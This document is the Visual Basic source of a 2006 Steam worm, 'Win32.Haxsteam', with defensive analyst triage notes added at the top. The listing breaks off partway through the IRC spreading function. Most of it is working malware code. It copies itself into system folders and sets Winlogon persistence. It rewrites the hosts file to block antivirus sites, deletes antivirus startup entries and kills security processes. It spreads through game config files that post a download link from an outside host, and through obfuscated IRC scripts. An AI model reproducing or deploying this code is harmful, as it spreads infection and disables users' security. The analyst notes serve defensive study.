========================================================================= Haxsteam.frm =========================================================================
VERSION 5.00
Begin VB.Form Haxsteam
   Caption = "Win32.Haxsteam"
   ClientHeight = 3090
   ClientLeft = 60
   ClientTop = 450
   ClientWidth = 4680
   Icon = "Haxsteam.frx":0000
   LinkTopic = "Form1"
   ScaleHeight = 3090
   ScaleWidth = 4680
   StartUpPosition = 3 'Windows Default
   Begin VB.Timer tmrCounter
      Enabled = 0 'False
      Interval = 1000
      Left = 960
      Top = 960
   End
   Begin VB.Timer tmrSteam
      Enabled = 0 'False
      Interval = 100
      Left = 1800
      Top = 1320
   End
   Begin VB.Timer tmrLogger
      Enabled = 0 'False
      Interval = 100
      Left = 1800
      Top = 600
   End
End
Attribute VB_Name = "Haxsteam"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'------------------------------------------------------------------------
' Analyst notes: defensive triage of this form module. Every item below is
' read off the code in this listing; nothing here was confirmed by execution.
'
' Form and timers
'   - Form_Load hides the form as its first statement (Haxsteam.Hide), so
'     the process runs without a visible window.
'   - tmrCounter (1000 ms), tmrSteam (100 ms) and tmrLogger (100 ms) are
'     disabled at design time. No statement in the reviewed part of the
'     listing enables them; the listing is cut off inside SteamPayloadFive.
'   - The module declares GetAsyncKeyState/GetKeyState, VK_CAPITAL and a
'     public strKeys buffer. That matches the keylogger the author's header
'     describes, but the logging code itself is not in view - TODO confirm.
'
' File-system artefacts (Form_Load unless noted)
'   - Copies of the running EXE: <System>\SteamDll32.exe,
'     <System>\WinSteam.exe, <SteamPath>\SteamHelper.exe,
'     <SteamPath>\ClientGUI.sys. The two System copies have their
'     attributes changed after the copy.
'   - <System>\drivers\etc\hosts is recreated from scratch; services and
'     protocol in the same folder are deleted. Each hosts entry uses an
'     address assembled from Chr() codes that spell 127.0.0.1, pointing AV
'     vendor, update, search, mail and gaming sites at loopback.
'   - userconfig.cfg is overwritten in each mod folder found under
'     <SteamPath>\SteamApps\<account>\ (InfectUserconfig).
'   - SpreadPerIrc writes cstrike_steam.html and, when the Gamers.IRC
'     inst_path registry value exists, <inst_path>\bin\grc\gamersirc.grc
'     (the extension is assembled from Chr() codes). That function never
'     assigns sysdir, so the HTML file may not land in the System folder -
'     confirm the real location on a sandbox run.
'   - SteamPayloadThree creates a \Haxsteam folder of empty decoy files on
'     every DriveType = 2 drive, and writes, runs, then deletes
'     <Windows>\wallhack.vbs, which fetches opengl32.dll over HTTP.
'   - Marker files <SteamPath>\PayloadOne.log .. PayloadFour.log record
'     which weekday payload ran.
'
' Registry artefacts
'   - Infection marker and run counter: HKEY_CLASSES_ROOT\Haxsteam
'     (installed, Counter). The counter gates the actions at values 7, 17
'     and 22.
'   - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell is
'     rewritten to start the WinSteam.exe copy (persistence).
'   - Explorer\Advanced Hidden = 0 and HideFileExt = 1 conceal the dropped
'     files and their extensions.
'   - HKCU\Software\Valve\Steam values SteamExe and
'     ActiveProcess\SteamClientDll are redirected to the dropped copies;
'     several other Steam values are changed as well.
'   - RegisteredOwner, RegisteredOrganization and the Internet Explorer
'     "Window Title" value are overwritten with the author's tags.
'   - TerminateSecurity deletes HKLM ...\CurrentVersion\Run values that
'     belong to anti-virus products.
'
' Process and network behaviour
'   - TerminateSecurity enumerates Win32_Process over WMI and terminates
'     named AV processes, plus any process whose name contains short
'     substrings such as "av", "svr" or "mgr". Expect unrelated processes
'     to be killed on an affected host.
'   - SteamPayloadFour shells out to msinfo32, tree, ipconfig /all, vol and
'     getmac, stages the output in infofile*.txt and mails it through
'     Outlook automation to a hard-coded address.
'   - Hard-coded hosts in the listing: czybik.cz.funpic.de and
'     encryboy.en.funpic.de.
'
' Detection and recovery pointers
'   - Alert on non-system writes to Winlogon\Shell and to
'     drivers\etc\hosts, on WMI-driven termination of security processes,
'     and on wscript.exe running a script from the Windows folder.
'   - Cleanup has to restore the hosts, services and protocol files, reset
'     Winlogon\Shell, and put back the Steam and Explorer values listed
'     above, in addition to removing the dropped copies.
'------------------------------------------------------------------------
'Win32.Haxsteam ©opyrights 2006 by sk0r
'This Worm was created by sk0r aka Czybik.
'You are not allowed to decompile the Worm!
'ViSiT my Site @ www.sk0r-czybik.de.vu
'
'This is a very good Steam Worm. It has
'much functions. I am proud to be the
'coder if this fantastic Steam Worm.
' ' ' Worm Functions: ' ---------------- ' ' - On first execute displays fake Message ' - Copy itself to Systemdir and Steamdir as Exe or Sys ' - Change its attributes to hidden, systemfile and write protected ' - Change registry Keys for windows and steams ' - disallows viewing websites of steam and avers ' - For monday till friday an other payload ' - delete reg values from avers ' - terminate security processes ' - spreading via steam using cs, tfc, op, dmc, dod and hl ' - spreading via irc, send html file and link which includes adodb steam exploit ' - payload: delete importent steam files so steam must update ' - payload: overwrites files with specific extension in steam with a string ' - payload: Creates for each drive a fake programm with empty files and folders ' - payload: downloads and copys a wallhack to specific mods to risk a vac2 bann ' - payload: sends specific informations about the user and the machine using outlook ' - If the machine is rebooting for the 7th time the worm seachs for files to overwrite ' - If the machine is rebootings for the 17th time the worm speaks a sentence ' - If the machine is rebooting for the 22th time a form with informations will occur ' - payload: worm starts a keylogger to logg the password and sends it to me ' - payload: writes a command to mod config to make Cell-Walls ingame ' ' ' Visit my homepages: Email me to: ' -------------------- ------------- ' ' www.sk0r-czybik.de.vu sk0r1337@web.de ' www.sk0r-virii.tk ' www.czybik-kit.tk ' '======================================================== Dim spkVoice As SpVoice Public strKeys As String Public cntCounter As Integer Private Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long) Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer Private Const VK_CAPITAL = &H14 Private Sub Form_Load() Haxsteam.Hide strInfomation = "Win32.Haxsteam 
Version 1.0 ¸2006 by sk0r alias Czybik (www.sk0r-czybik.de.vu)" On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") Set sysdir = fso.getspecialfolder(1) Set wmiObj = GetObject("winmgmts:") Set inSystem = wmiObj.InstancesOf("Win32_process") MostRegVal = "HKEY_CLASSES_ROOT\Haxsteam" steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") If (wshs.regread(MostRegVal & "\installed\") = "") Then MsgBox (App.Path + "\" + App.EXEName + ".exe ist keine zul„ssige Win32-Anwendung."), vbOKOnly + vbCritical, App.Path + "\" + App.EXEName + ".exe" wshs.regwrite MostRegVal + "\installed", "yes" End If myworm = App.Path + "\" + App.EXEName + ".exe" Set gtmyworm = fso.getfile(myworm) If Not fso.fileexists(sysdir + "\SteamDll32.exe") Then gtmyworm.Copy (sysdir + "\SteamDll32.exe") End If If Not fso.fileexists(sysdir + "\WinSteam.exe") Then gtmyworm.Copy (sysdir + "\WinSteam.exe") End If If Not fso.fileexists(steampath + "\SteamHelper.exe") Then gtmyworm.Copy (steampath + "\SteamHelper.exe") End If If Not fso.fileexists(steampath + "\ClientGUI.sys") Then gtmyworm.Copy (steampath + "\ClientGUI.sys") End If Set gtforattr1 = fso.getfile(sysdir + "\SteamDll32.exe") gtforattr1.Attributes = gtforattr1 + 4 gtforattr1.Attributes = gtforattr1 + 2 gtforattr1.Attributes = gtforattr1 + 1 Set gtforattr2 = fso.getfile(sysdir + "\WinSteam.exe") gtforattr2.Attributes = gtforattr2 + 4 gtforattr2.Attributes = gtforattr2 + 2 gtforattr2.Attributes = gtforattr2 + 1 wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe " + sysdir + " \WinSteam.exe" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD" wshs.regwrite 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Haxsteam" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Haxed by sk0r" wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0rCzybik" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\language", "japanese" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\SteamExe", steampath + "\SteamHelper.exe" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\LastGameNameUsed", "sk0r1337" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\Rate", "7500" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\NoSavePersonalInfo", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\Offline", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\RefreshLoginRequired", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\SetRate", 0, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\ActiveProcess\SteamClientDll", steampath + "\ClientGUI.sys" myhomepage = "http://encryboy.en.funpic.de/steamfake.html" normalsite = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\LastContentProviderURL" & "valve_homepage") If normalsite <> myhomepage Then wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\LastContentProviderURL", myhomepage End If cntReader = wshs.regread(MostRegVal & "\Counter\") If cntReader = "" Then wshs.regwrite MostRegVal + "\Counter", 1, "REG_DWORD" End If wshs.regwrite MostRegVal + "\counter", cntReader + 1, "REG_DWORD" fso.deletefile (sysdir + "\drivers\etc\services") fso.deletefile (sysdir + "\drivers\etc\protocol") LocalIpAddress = Chr(49) & Chr(50) & Chr(55) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49) Set crtHostFl = fso.createtextfile(sysdir + "\drivers\etc\hosts", True) With crtHostFl .writeline ("# Win32.Haxsteam.A ¸2006 by sk0r alias Czybik") .writeline ("# I don't allow you to visit Cs 
Sites") .writeline (" ") .writeline (LocalIpAddress + " www.antivir.de") .writeline (LocalIpAddress + " www.bitdefender.de ") .writeline (LocalIpAddress + " www.znet.de") .writeline (LocalIpAddress + " www.chip.de") .writeline (LocalIpAddress + " www.virustotal.com") .writeline (LocalIpAddress + " virusscan.jotti.org") .writeline (LocalIpAddress + " www.kaspersky.com") .writeline (LocalIpAddress + " www.sophos.de") .writeline (LocalIpAddress + " www.trojaner-info.de ") .writeline (LocalIpAddress + " www.trojaner-help.de ") .writeline (LocalIpAddress + " www.arcabit.com ") .writeline (LocalIpAddress + " www.avast.com ") .writeline (LocalIpAddress + " www.grisoft.com ") .writeline (LocalIpAddress + " www.bitdefender.com ") .writeline (LocalIpAddress + " www.clamav.net ") .writeline (LocalIpAddress + " www.drweb.com ") .writeline (LocalIpAddress + " www.f-prot.com ") .writeline (LocalIpAddress + " www.google.de ") .writeline (LocalIpAddress + " www.fortinet.com") .writeline (LocalIpAddress + " www.nod32.com ") .writeline (LocalIpAddress + " www.norman.com ") .writeline (LocalIpAddress + " www.microsoft.com") .writeline (LocalIpAddress + " www.anti-virus.by/en") .writeline (LocalIpAddress + " www.symantec.com ") .writeline (LocalIpAddress + " www.windowsupdate.com ") .writeline (LocalIpAddress + " www.trendmicro.com ") .writeline (LocalIpAddress + " www.mcafee.com ") .writeline (LocalIpAddress + " www.viruslist.com") .writeline (LocalIpAddress + " www.avp.com ") .writeline (LocalIpAddress + " www.zonelabs.com") .writeline (LocalIpAddress + " www.heise.de ") .writeline (LocalIpAddress + " www.antivirus-online.de") .writeline (LocalIpAddress + " www.free-av.com ") .writeline (LocalIpAddress + " www.panda-software.com") .writeline (LocalIpAddress + " www.pc-welt.de ") .writeline (LocalIpAddress + " www.pc-special.net") .writeline (LocalIpAddress + " download.freenet.de ") .writeline (LocalIpAddress + " www.vollversion.de ") .writeline (LocalIpAddress + " 
www.das-download-archiv.de") .writeline (LocalIpAddress + " www.freeware.de ") .writeline (LocalIpAddress + " www.antiviruslab.com") .writeline (LocalIpAddress + " www.search.yahoo.com") .writeline (LocalIpAddress + " www.web.de ") .writeline (LocalIpAddress + " www.hotmail.com") .writeline (LocalIpAddress + " www.hotmail.de") .writeline (LocalIpAddress + " www.gmx.net") .writeline (LocalIpAddress + " www.esl-europe.net") .writeline (LocalIpAddress + " www.cs-expert.de") .writeline (LocalIpAddress + " www.spiegel.de") .writeline (LocalIpAddress + " www.icq.com") .writeline (LocalIpAddress + " www.icq.de ") .writeline (LocalIpAddress + " www.og-cheats.de") .writeline (LocalIpAddress + " www.flirtlife.de") .writeline (LocalIpAddress + " www.ffh.de") .writeline (LocalIpAddress + " www.counter-strike.de") .writeline (LocalIpAddress + " www.counterstrike.de") .writeline (LocalIpAddress + " www.4players.de") .writeline (LocalIpAddress + " www.serverleih.de") .writeline (LocalIpAddress + " www.esl-europe.net") .writeline (LocalIpAddress + " www.cs-expert.de") .writeline (LocalIpAddress + " www.og-cheats.de") .writeline (LocalIpAddress + " www.counter-hacks.de") .writeline (LocalIpAddress + " www.csconfigs.de") .writeline (LocalIpAddress + " www.daddeln.de") .writeline (LocalIpAddress + " www.leaguez.com") .writeline (LocalIpAddress + " www.planethalflife.com") .writeline (LocalIpAddress + " www.google.de") .writeline (LocalIpAddress + " www.search.yahoo.com") .writeline (LocalIpAddress + " www.search.yahoo.de") .writeline (LocalIpAddress + " www.netsettings.net") .writeline (LocalIpAddress + " www.gigaliga.de") .writeline (LocalIpAddress + " www.readmore.de") .writeline (LocalIpAddress + " www.counterstrike-games.de") .writeline (LocalIpAddress + " www.schroet.de") .writeline (LocalIpAddress + " www.mousesports.com") .writeline (LocalIpAddress + " www.clanserver4u.de") .writeline (LocalIpAddress + " www.krankehorde.de") .writeline (LocalIpAddress + " www.a-losers.org") 
.writeline (LocalIpAddress + " www.team-ger.de") .writeline (LocalIpAddress + " www.rushed.de") .writeline (LocalIpAddress + " www.mymtw.de") .writeline (LocalIpAddress + " www.giga.de") .writeline (LocalIpAddress + " www.config-tuning.de") .writeline (LocalIpAddress + " www.steampowered.com") .writeline (LocalIpAddress + " www.golem.de") .writeline (LocalIpAddress + " www.pc-games.de") .writeline (LocalIpAddress + " www.mp-gamer.de") .writeline (LocalIpAddress + " www.4cheaters.de") .writeline (LocalIpAddress + " www.e-sb.de") .writeline (LocalIpAddress + " www.ngz-server.de") .writeline (LocalIpAddress + " www.esport-servers.de") .writeline (LocalIpAddress + " www.digitallabs.de") .writeline (LocalIpAddress + " www.digitallabs.com") .writeline (LocalIpAddress + " www.ckras.com") .writeline (LocalIpAddress + " www.quado.net") .writeline (LocalIpAddress + " www.linemax.de") .writeline (LocalIpAddress + " www.arena7.de") .writeline (LocalIpAddress + " www.nitrado.net") .writeline (LocalIpAddress + " www.xenonserver.de") .writeline (LocalIpAddress + " www.cs-arena.com") .writeline (LocalIpAddress + " www.go2irc.com") .writeline (LocalIpAddress + " www.nordic-it.de") .writeline (LocalIpAddress + " www.monsterserver.de") .writeline (LocalIpAddress + " www.servercamp.de") .writeline (LocalIpAddress + " www.clanservers.com") .writeline (LocalIpAddress + " www.4netplayers.de") .writeline (LocalIpAddress + " www.gameservercheck.de") .writeline (LocalIpAddress + " www.stormix.de") .writeline (LocalIpAddress + " www.clanserverz.de") .writeline (LocalIpAddress + " www.server4all.de") .writeline (LocalIpAddress + " www.teamplay.de") .writeline (LocalIpAddress + " www.gameserver4u.de") .writeline (LocalIpAddress + " www.csconfigs.mthone.de") .writeline (LocalIpAddress + " www.spraylogos.de") .writeline (LocalIpAddress + " www.planet-videos.com") .writeline (LocalIpAddress + " www.unitedadmins.com") .writeline (LocalIpAddress + " www.wwcl.net") .writeline (LocalIpAddress + " 
www.tng-clan.de") .writeline (LocalIpAddress + " www.thezproject.org") .writeline (LocalIpAddress + " www.unitedservers.de") .writeline (LocalIpAddress + " www.mirc-scripts.de") .writeline (LocalIpAddress + " www.zerogamers.com") .writeline (LocalIpAddress + " www.die-opfer.info") .writeline (LocalIpAddress + " www.baerlinonline.de") .writeline (LocalIpAddress + " www.counterstrike.net") .writeline (LocalIpAddress + " www.counter-strike.net") .writeline (LocalIpAddress + " www.security.mods.de") .writeline (LocalIpAddress + " www.3dsupply.de") .writeline (LocalIpAddress + " www.hltv.at") .writeline (LocalIpAddress + " www.blank-tv.de") .writeline (LocalIpAddress + " www.cstrike.de") .writeline (LocalIpAddress + " www.the-cpl.com") .writeline (LocalIpAddress + " www.core64.de") .writeline (LocalIpAddress + " www.cs.gamer-scene.com") .writeline (LocalIpAddress + " www.gamer-scene.com") .writeline (LocalIpAddress + " www.esports-award.org") .Close End With TerminateSecurity SpreadPerSteam SpreadPerIrc intWochentag = Weekday(Now) - 1 If intWochentag = 1 Then SteamPayloadOne ElseIf intWochentag = 2 Then SteamPayloadTwo ElseIf intWochentag = 3 Then SteamPayloadThree ElseIf intWochentag = 4 Then SteamPayloadFour ElseIf intWochentag = 5 Then SteamPayloadFive Else Unload Me End If If cntReader = 7 Then OverwriteSpecificFiles End If If cntReader = 17 Then SpeakTheVoice ("Sorry, I just want to say, that you have been hecked.") End If If cntReader = 22 Then funcShowInformations End If End Sub Function TerminateSecurity() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set wmi = GetObject("winmgmts:") Set inSystem = wmi.InstancesOf("Win32_Process") wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC" wshs.regdelete 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask" For Each sp In inSystem If LCase(sp.Name) = "avguard.exe" Or LCase(sp.Name) = "avconfig.exe" Or LCase(sp.Name) = "avscan.exe" _ Or LCase(sp.Name) = "avcenter.exe" Or LCase(sp.Name) = "avgnt.exe" Or LCase(sp.Name) = "update.exe" _ Or LCase(sp.Name) = "preupd.exe" Or LCase(sp.Name) = "avcmd.exe" Or LCase(sp.Name) = "avesvc.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "kav.exe" Or LCase(sp.Name) = "kavsvc.exe" Or LCase(sp.Name) = "kavsend.exe" Or _ LCase(sp.Name) = "keymanager.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "agentsvr.exe" Or LCase(sp.Name) = "avgcc.exe" Or LCase(sp.Name) = "avgupsvc.exe" _ Or LCase(sp.Name) = "avgamsvr.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "vsserv.exe" Or LCase(sp.Name) = "bdss.exe" Or LCase(sp.Name) = "xcommsvr.exe" _ Or LCase(sp.Name) = "bdnagent.exe" Or LCase(sp.Name) = "bdoesrv.exe" Or LCase(sp.Name) = "bdmcon.exe" _ 
Or LCase(sp.Name) = "bdswitch.exe" Or LCase(sp.Name) = "rtvr.exe" Or LCase(sp.Name) = "bdsubmit.exe" _ Or LCase(sp.Name) = "bdlite.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "agentsvr.exe" Or LCase(sp.Name) = "tmproxy.exe" Or LCase(sp.Name) = "PcCtlCom.exe" _ Or LCase(sp.Name) = "pccguide.exe" Or LCase(sp.Name) = "qttask.exe" Or LCase(sp.Name) = "patch.exe" _ Or LCase(sp.Name) = "Tmntsrv.exe" Or LCase(sp.Name) = "PccPrm.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "DrWebUpW.exe" Or LCase(sp.Name) = "spidernt.exe" Or LCase(sp.Name) = "DrWebScd.exe" _ Or LCase(sp.Name) = "DrWeb32w.exe" Or LCase(sp.Name) = "drwadins.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "mcupdui.exe" Or LCase(sp.Name) = "McTskshd.exe" Or LCase(sp.Name) = "McAppIns.exe" _ Or LCase(sp.Name) = "mghtml.exe" Or LCase(sp.Name) = "McShield.exe" Or LCase(sp.Name) = "Mcdetect.exe" _ Or LCase(sp.Name) = "McVSEscn.exe" Or LCase(sp.Name) = "oasclnt.exe" Or LCase(sp.Name) = "mcvsshld.exe" Then sp.Terminate (0) End If If InStr(sp.Name, "clean") Or InStr(sp.Name, "save") Or InStr(sp.Name, "av") Or InStr(sp.Name, "svr") _ Or InStr(sp.Name, "mgr") Or InStr(sp.Name, "syma") Or InStr(sp.Name, "resc") Or InStr(sp.Name, "guar") Then sp.Terminate (0) End If Next End Function Function SpreadPerSteam() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Randomize: intNumberRandoom = Int(7 * Rnd) + 1 If intNumberRandoom = 1 Then ChatMessage = "World biggest cfg and priv hack summarize!" ElseIf intNumberRandoom = 2 Then ChatMessage = "Download original Xs1cht and Headstyle Rc!!" ElseIf intNumberRandoom = 3 Then ChatMessage = "Orgia Crack v10 working!! Download it and own!" ElseIf intNumberRandoom = 4 Then ChatMessage = "Pixelaimbot v5.2 working (undetectable) downlaod!" 
ElseIf intNumberRandoom = 5 Then ChatMessage = "Download 1337 Config by Mouz|Jonny (Original, no fake!!)" ElseIf intNumberRandoom = 6 Then ChatMessage = "h4xx0r sound config download! Better then A3D 2.0 (working)" ElseIf intNumberRandoom = 7 Then ChatMessage = "download priv config h4xx0r maker by hirsche! (no fake)" Else ChatMessage = "download private optimizer by z0rr0.. kommt viel mehr an (geht wirklich!!)" End If Set gtfldr = fso.getfolder(steampath + "\SteamApps") For Each AccountFolder In gtfldr.subfolders If fso.folderexists(AccountFolder.Path + "\counter-strike\cstrike") Then InfectUserconfig (AccountFolder.Path + "\counter-strike\cstrike") End If If fso.folderexists(AccountFolder.Path + "\day of defeat\dod") Then InfectUserconfig (AccountFolder.Path + "\day of defeat\dod") End If If fso.folderexists(AccountFolder.Path + "\deathmatch classic\dmc") Then InfectUserconfig (AccountFolder.Path + "\deathmatch classic\dmc") End If If fso.folderexists(AccountFolder.Path + "\half-life\valve") Then InfectUserconfig (AccountFolder.Path + "\half-life\valve") End If If fso.folderexists(AccountFolder.Path + "\opposing force\gearbox") Then InfectUserconfig (AccountFolder.Path + "\opposing force\gearbox") End If If fso.folderexists(AccountFolder.Path + "\team fortress classic\tfc") Then InfectUserconfig (AccountFolder.Path + "\team fortress classic\tfc") End If Next End Function Function InfectUserconfig(strModPath As String) On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") WhileWallsString = "gl_max_size " + Chr(34) + "2" + Chr(34) + "; alias gl_max_size" Set openusercfg = fso.createtextfile(strModPath + "\userconfig.cfg", True) openusercfg.Write ("//Win32.Haxsteam.A Userconfig Spread (Like IM-Worms)" + vbCrLf) openusercfg.Write ("//===========================================" + 
vbCrLf) openusercfg.Write ("//Begin Config h4xx0ring:" + vbCrLf) openusercfg.Write ("alias ""SkorWrite"" ""say http://czybik.cz.funpic.de/Haxsteam/Haxsteam.zip <= " + ChatMessage + " "";" + vbCrLf) openusercfg.Write ("alias ""SkorSleep"" ""echo Haxed by Win32.Haxsteam.A"";" + vbCrLf) openusercfg.Write ("alias ""SkorGo"" ""SkorAn"";" + vbCrLf) openusercfg.Write ("alias ""SkorAn"" ""SkorWrite; alias SkorGo SkorAus"";" + vbCrLf) openusercfg.Write ("alias ""SkorAus"" ""SkorSleep; alias SkorGo SkorSchmaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorSchmaus"" ""SkorSleep; alias SkorGo SkorLaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorLaus"" ""SkorSleep; alias SkorGo SkorKaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorKaus"" ""SkorSleep; alias SkorGo SkorSaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorSaus"" ""SkorSleep; alias SkorGo SkorBraus"";" + vbCrLf) openusercfg.Write ("alias ""SkorBraus"" ""SkorSleep; alias SkorGo SkorXaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorXaus"" ""SkorSleep; alias SkorGo SkorZaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorZaus"" ""SkorSleep; alias SkorGo SkorAn"";" + vbCrLf) openusercfg.Write ("alias ""m_pitch"" ""SkorGo"";" + vbCrLf) openusercfg.Write (WhileWallsString + vbCrLf) openusercfg.Write ("s_enable_a3d;" + vbCrLf) openusercfg.Write ("s_a3d ""1""; alias s_a3d;" + vbCrLf) openusercfg.Write ("rate ""7500""; alias rate" + vbCrLf) openusercfg.Write ("cl_updaterate ""10""; //alias cl_updaterate" + vbCrLf) openusercfg.Write ("cl_cmdrate ""1""; //alias cl_cmdrate" + vbCrLf) openusercfg.Write ("//End Config h4xx0ring" + vbCrLf) openusercfg.Write ("//===========================================" + vbCrLf) openusercfg.Write ("//Win32.Haxsteam.A Userconfig Spread (Like IM-Worms)" + vbCrLf) End Function Function SpreadPerIrc() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") 
steampath = Replace(steampath, "/", "\") Set crtDownloadHtml = fso.createtextfile(sysdir + "\cstrike_steam.html", True) crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" Funny Counter-Strike Pictures ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline ("

Funny Counter-Strike Pictures

") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("Please wait while initializing the pictures.
") crtDownloadHtml.writeline ("Note, that you need ActiveX and internet explorer
") crtDownloadHtml.writeline ("to view the funny counter-strike pictures
") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("

Click here to see more great things

") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.Close onconnect = "!!!!o!!!!n!!!! !!!!1!!!:!!!!c!!!!o!!!n!!!!n!!!!e!!!!c!!!t!!!!:!!!{!!!!" onconnect = Replace(onconnect, "!", "") onjoin = "!!!!o!!!!n!!!! !!!!1!!!!:!!!!j!!!!o!!!!i!!!!n!!!!:!!!!#!!!!:!!!! !!!{!!!!" onjoin = Replace(onjoin, "!", "") haltt = "õõõiõõõõfõõõ õõõ(õõõ$õõõõnõõõiõõõcõõõkõõõ õõõ!õõõ=õõõ õõõ$õõõmõõõeõõõ)õõõ õõõ{õõõõ" + vbCrLf haltt = haltt + "õõõhõõõõaõõõõlõõõtõõõõ" + vbCrLf haltt = haltt + "õõõõ}õõõõ" + vbCrLf haltt = Replace(haltt, "õ", "") userdatarant = "???v????a???r???? ???%????t???h????e???u????s???e????r??? ????=??? ????$???n????i???c????k??? " + vbCrLf userdatarant = userdatarant + "???v????a???r???? ???%????d???a????t???a???? ???=???? " + sysdir + "???\????c???s????t???r????i???k????e???_????s???t????e???a????m???.????h???t????m???l????" + vbCrLf userdatarant = userdatarant + "????v???a????r??? ????%???r????a???n????d??? ????=??? ????$???r????a???n????d???(????a???,???? ???c????)???" + vbCrLf userdatarant = Replace(userdatarant, "?", "") dccsend = "õõõõdõõõcõõõcõõõõ õõõsõõõõeõõõnõõõõdõõõ õõõõ-õõõcõõõõ õõõ%õõõõtõõõhõõõõeõõõuõõõõsõõõeõõõõrõõõ õõõõ%õõõdõõõõaõõõtõõõõaõõõ" dccsend = Replace(dccsend, "õ", "") msglink = "((((m(((s((((g((( 